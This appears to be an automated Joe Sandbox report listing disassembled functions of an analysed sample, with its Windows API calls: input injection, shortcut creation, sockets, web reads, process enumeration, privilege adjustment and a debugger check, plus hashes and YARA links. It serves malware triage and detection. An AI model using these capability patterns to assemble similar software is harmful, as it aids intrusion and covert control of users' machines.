Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 6438fa1dae4be82e3f1e67f6d38bb40d6ac640762a464eda0afb28ce18a09e8f
Instruction ID: b94f35600fa1faed84426f93ab01cc4148812555cb312560ec175ac0d9ad1d44
Opcode Fuzzy Hash: 6438fa1dae4be82e3f1e67f6d38bb40d6ac640762a464eda0afb28ce18a09e8f
Instruction Fuzzy Hash: BEC23972E086288FDB25CE28DD447EAB7B5FB48315F1541EAD84DE7241E778AE818F40

Function 0078648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 007864DC
CoInitialize.OLE32(00000000), ref: 00786639
CoCreateInstance.OLE32(007AFCF8,00000000,00000001,007AFB68,?), ref: 00786650
CoUninitialize.OLE32 ref: 007868D4

Strings

.lnk, xrefs: 007864BA, 00786524, 007865E0

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 1ad0bd90e4bae2a157a8b23998a23ee03dacb8135cf5a17facc95dd45ec2817f
Instruction ID: b5e507368f04c98dbfce830ca91f85da0fafd7c3864cf5ddf2751edc04662272
Opcode Fuzzy Hash: 1ad0bd90e4bae2a157a8b23998a23ee03dacb8135cf5a17facc95dd45ec2817f
Instruction Fuzzy Hash: 3FD15D71548301AFC304EF24C8959ABB7E8FF98704F00496DF5958B291DB74ED46CBA2

Function 007922DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 007922E8

Part of subcall function 0078E4EC: GetWindowRect.USER32(?,?), ref: 0078E504

GetDesktopWindow.USER32 ref: 00792312
GetWindowRect.USER32(00000000), ref: 00792319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00792355
GetCursorPos.USER32(?), ref: 00792381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 007923DF

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: 74626ba06ae9e3f32bfdbd6df191f89e4cc1576afe3b89ae312d9380aa37dded
Instruction ID: 251b3c70d79bc3e8cc5b3627ad737d4d9e2cbdc03e739c03e570955870b0e2a4
Opcode Fuzzy Hash: 74626ba06ae9e3f32bfdbd6df191f89e4cc1576afe3b89ae312d9380aa37dded
Instruction Fuzzy Hash: 5931E072504315AFCB21EF14D849B5BBBA9FFC9310F004919F98997182DB38EA09CB96

Function 00789B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00719CB3: _wcslen.LIBCMT ref: 00719CBD

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00789B78
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00789C8B

Part of subcall function 00783874: GetInputState.USER32 ref: 007838CB
Part of subcall function 00783874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00783966

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00789BA8
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00789C75

Strings

*.*, xrefs: 00789B5D

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: 09a0309cb29f231e064a647f5641163a1e40ab224fe65885183f3076a809259f
Instruction ID: a90d64912a4ddcf9ee2f3db1ae3159fdb9dd2a2be9e2a67a55a1f03b3bc84655
Opcode Fuzzy Hash: 09a0309cb29f231e064a647f5641163a1e40ab224fe65885183f3076a809259f
Instruction Fuzzy Hash: 66418371940209EFDF15EF74C849AEEBBB4FF45310F244156E905A2191EB399E84CF64

Function 0072997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON

Download Yara Rule

APIs

Part of subcall function 00729BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00729BB2

DefDlgProcW.USER32(?,?,?,?,?), ref: 00729A4E
GetSysColor.USER32(0000000F), ref: 00729B23
SetBkColor.GDI32(?,00000000), ref: 00729B36

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Color$LongProcWindow
String ID:
API String ID: 3131106179-0
Opcode ID: fa809e35345170dc9e7ca2c602f505803d98e37d457e3317320fb0adc8c3934d
Instruction ID: 537bb205f96940ef3e425cb51287367c28107cd6367a87638e964c25096f45ba
Opcode Fuzzy Hash: fa809e35345170dc9e7ca2c602f505803d98e37d457e3317320fb0adc8c3934d
Instruction Fuzzy Hash: 41A14BB0109564FEE72D9A3CAC8DD7B26ADDF87354F188209FB03CA591CA2D9D41C275

Function 00791806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0079304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0079307A
Part of subcall function 0079304E: _wcslen.LIBCMT ref: 0079309B

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0079185D
WSAGetLastError.WSOCK32 ref: 00791884
bind.WSOCK32(00000000,?,00000010), ref: 007918DB
WSAGetLastError.WSOCK32 ref: 007918E6
closesocket.WSOCK32(00000000), ref: 00791915

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: 05a676cb686d0d096d18536a321371709b4f72738e5fa3d793365e6b9cae3269
Instruction ID: b58b9c2e3cb7a583d2fb73c7095b2db2ab23c087bce01bb604ccd77e3dc0044c
Opcode Fuzzy Hash: 05a676cb686d0d096d18536a321371709b4f72738e5fa3d793365e6b9cae3269
Instruction Fuzzy Hash: 5D51B271A00210AFEB10AF28D88AF6A77E5AB45718F48C098F9155F3C3C779AD41CBE1

Function 007A1C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 007A1CC0
IsWindowEnabled.USER32 ref: 007A1CCE
GetForegroundWindow.USER32(?,?,00000001,?), ref: 007A1CDB
IsIconic.USER32 ref: 007A1CE9
IsZoomed.USER32 ref: 007A1CF7

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 75a7eb5387a3e1d9517a3c40989eeb29a6e49fb45078b7826b829fcbaab44ffc
Instruction ID: a8996c36dca701b868b75ecbc45157b8a3a4aa0f26dac9a65b8e974d398cc0dc
Opcode Fuzzy Hash: 75a7eb5387a3e1d9517a3c40989eeb29a6e49fb45078b7826b829fcbaab44ffc
Instruction Fuzzy Hash: 2B21B5317402109FE7218F2AC844B6A7BE5EFC6325F598158E846CB352DB79DC42CBA4

Function 00718060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON

Download Yara Rule

Strings

VUUU, xrefs: 007183E8
VUUU, xrefs: 0071843C
VUUU, xrefs: 00755DF0
VUUU, xrefs: 007183FA
ERCP, xrefs: 0071813C

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: df8e9dc1cdb6a7926c90eeb52d33befd0598dd8548cd29112a85b89358718b2d
Instruction ID: 6f557e7a13bc18746ad785e39757a3d4a7b738f0cd969186fb62d65c51621c92
Opcode Fuzzy Hash: df8e9dc1cdb6a7926c90eeb52d33befd0598dd8548cd29112a85b89358718b2d
Instruction Fuzzy Hash: F1A29F70E0061ACBDF64CF58C8907EDB7B1BB54311F2481AAEC15A7285EB789DC5CB91

Function 00778298 Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 007782AA

Strings

(, xrefs: 007782F0
tb}, xrefs: 007784F4
|, xrefs: 007782DA

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: lstrlen
String ID: ($tb}$|
API String ID: 1659193697-2483859856
Opcode ID: a70b82da92201749d57476ebe8f2d771d6945227e457d1ce147e39cf1a968d70
Instruction ID: a241425c70ab24491b6eaa44b3166cd77de142b95661e282271aac67f5c28c39
Opcode Fuzzy Hash: a70b82da92201749d57476ebe8f2d771d6945227e457d1ce147e39cf1a968d70
Instruction Fuzzy Hash: B8323474A00605DFCB68CF69C084A6AB7F0FF48750B15C56EE49ADB3A1EB74E981CB41

Function 0079A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0079A6AC
Process32FirstW.KERNEL32(00000000,?), ref: 0079A6BA

Part of subcall function 00719CB3: _wcslen.LIBCMT ref: 00719CBD

Process32NextW.KERNEL32(00000000,?), ref: 0079A79C
CloseHandle.KERNEL32(00000000), ref: 0079A7AB

Part of subcall function 0072CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00753303,?), ref: 0072CE8A

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: 82d1504f0f097ab45a52c8be3ffb20f3c1b9fbee890b56d18304c96de7d0d9fc
Instruction ID: 6577b24413231ee6815e4e94667bde4ead71ac23d8920695cd086d0c33202d25
Opcode Fuzzy Hash: 82d1504f0f097ab45a52c8be3ffb20f3c1b9fbee890b56d18304c96de7d0d9fc
Instruction Fuzzy Hash: 85512C71508310EFD710EF28D88AA5BBBE8FF89754F00891DF58597291EB34E945CB92

Function 0077AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0077AAAC
SetKeyboardState.USER32(00000080), ref: 0077AAC8
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0077AB36
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0077AB88

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 32e0fa2ea806937e60ccd7e3bb6284240c35afdf3502e4d20e6411c8ac2fb7bb
Instruction ID: f7b293f2b0219cd9f7f119fe342ad18b58da321774cfe073e7bc186f8075620e
Opcode Fuzzy Hash: 32e0fa2ea806937e60ccd7e3bb6284240c35afdf3502e4d20e6411c8ac2fb7bb
Instruction Fuzzy Hash: E33109B1A40248BEFF35CA64CC05BFE77A6ABC5350F04C21AF189561E1D37C9985C766

Function 0078CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 0078CE89
GetLastError.KERNEL32(?,00000000), ref: 0078CEEA
SetEvent.KERNEL32(?,?,00000000), ref: 0078CEFE

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: e9ead9153a08f7de0269bb3caec01bcef9ac18df9910645065bfe02d507bfe0c
Instruction ID: 5ab7a1b3cc7ec420ee4d53d9262dfa284f086548df018b9464d9b5e09cb0678b
Opcode Fuzzy Hash: e9ead9153a08f7de0269bb3caec01bcef9ac18df9910645065bfe02d507bfe0c
Instruction Fuzzy Hash: 8B21CFB2540305EBEB32EF65C949BA7B7FCEB40314F10841EE646D2151EB78EE048B64

Function 0077DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00755222), ref: 0077DBCE
GetFileAttributesW.KERNEL32(?), ref: 0077DBDD
FindFirstFileW.KERNEL32(?,?), ref: 0077DBEE
FindClose.KERNEL32(00000000), ref: 0077DBFA

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 7fc455223917fb0fcf06fe3d132dd4ee6b2e069a4ca13ffdbcd0756ea121652e
Instruction ID: 0e8db9eb0887bbd4ddfbbb28e9558a1b47cc3b62dee6685332612eef450e94a1
Opcode Fuzzy Hash: 7fc455223917fb0fcf06fe3d132dd4ee6b2e069a4ca13ffdbcd0756ea121652e
Instruction Fuzzy Hash: 91F0EC304105146B96326B7CDC0D4AA377CAE42374F10C702F43AC10F0EBB85D54C5E9

Function 00785C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00785CC1
FindNextFileW.KERNEL32(00000000,?), ref: 00785D17
FindClose.KERNEL32(?), ref: 00785D5F

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: ce78ccbf684e5c05e418c5a5ee7bb26b4b550b23b436658532e5322696a1d5c4
Instruction ID: 5caa924bceda6421d0d6e14505dfd43ae1edbb1c833121143203ab90be7874f7
Opcode Fuzzy Hash: ce78ccbf684e5c05e418c5a5ee7bb26b4b550b23b436658532e5322696a1d5c4
Instruction Fuzzy Hash: 15519A75704A01DFC714DF28C498A96B7E4FF49314F14855EE95A8B3A2CB38EC44CBA1

Function 00742622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0074271A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00742724
UnhandledExceptionFilter.KERNEL32(?), ref: 00742731

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 8636de60ace649e46909e61b952a10aac7fee11139386ba5090c5d235afd6f0e
Instruction ID: 900e284fc14a955f19388db890ddb076f9fd90f0d7a85a3fb04be8894caacda3
Opcode Fuzzy Hash: 8636de60ace649e46909e61b952a10aac7fee11139386ba5090c5d235afd6f0e
Instruction Fuzzy Hash: CF31D57494122CABCB21DF64DD887DCBBB8AF08310F5081EAE40CA7261E7349F818F45

Function 007851CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 007851DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00785238
SetErrorMode.KERNEL32(00000000), ref: 007852A1

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 470bd785796b26f8d892bd122243fe070f897c7f61540a6105675284aa374ae5
Instruction ID: 90bb344ff3262e5ec305e0776f52d376dd1277b17bb60e7ed54efc3fd2a2e9d7
Opcode Fuzzy Hash: 470bd785796b26f8d892bd122243fe070f897c7f61540a6105675284aa374ae5
Instruction Fuzzy Hash: 10315075A00518DFDB00DF54D888EADBBF5FF49314F088099E8059B392DB35E856CB90

Function 007716C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 0072FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00730668
Part of subcall function 0072FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00730685

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0077170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0077173A
GetLastError.KERNEL32 ref: 0077174A

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: de3d253ce0d89adb7ae291b7144a6e2545366d7955df46284ca7488c850d095e
Instruction ID: 006df684b40a2ef75372a37d626e28427f634c7938695d93609e416c9fcde467
Opcode Fuzzy Hash: de3d253ce0d89adb7ae291b7144a6e2545366d7955df46284ca7488c850d095e
Instruction Fuzzy Hash: 4D1191B2504304BFDB189F54EC86D6BB7BDEB44754B20C52EE05657241EB74BC418B64

Function 0077D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0077D608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0077D645
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0077D650

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 6c0d9351c165cef0156cadfeffa3ece59667236d4e04fc6272c4073093d1bfb3
Instruction ID: e160c162093a01a06ebec37c6d1e6b3681c2ad03cd159bce7f979925ac246f02
Opcode Fuzzy Hash: 6c0d9351c165cef0156cadfeffa3ece59667236d4e04fc6272c4073093d1bfb3
Instruction Fuzzy Hash: 52115E75E05228BFDB218F95DC45FAFBBBCEB45B90F108115F908E7290D6744E058BA1

Function 00771663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0077168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 007716A1
FreeSid.ADVAPI32(?), ref: 007716B1

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

